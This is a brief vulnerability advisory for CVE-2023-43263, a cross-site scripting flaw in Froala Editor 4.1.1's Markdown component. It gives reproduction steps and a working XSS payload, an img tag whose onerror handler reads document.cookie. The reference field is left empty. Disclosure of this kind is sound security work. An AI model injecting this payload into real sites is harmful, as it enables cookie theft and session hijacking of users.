CVE ID: CVE-2023-43263
Vulnerability Type: Cross-Site Scripting
Description: Cross-site scripting (XSS) vulnerability in Froala Editor v.4.1.1 allows attackers to execute arbitrary code via the Markdown component.
Steps to reproduce:
Enter the following payload in the Markdown component input:
<a title ="a
<img src=x onerror=console.log(document.cookie)>xss</a>
Reference: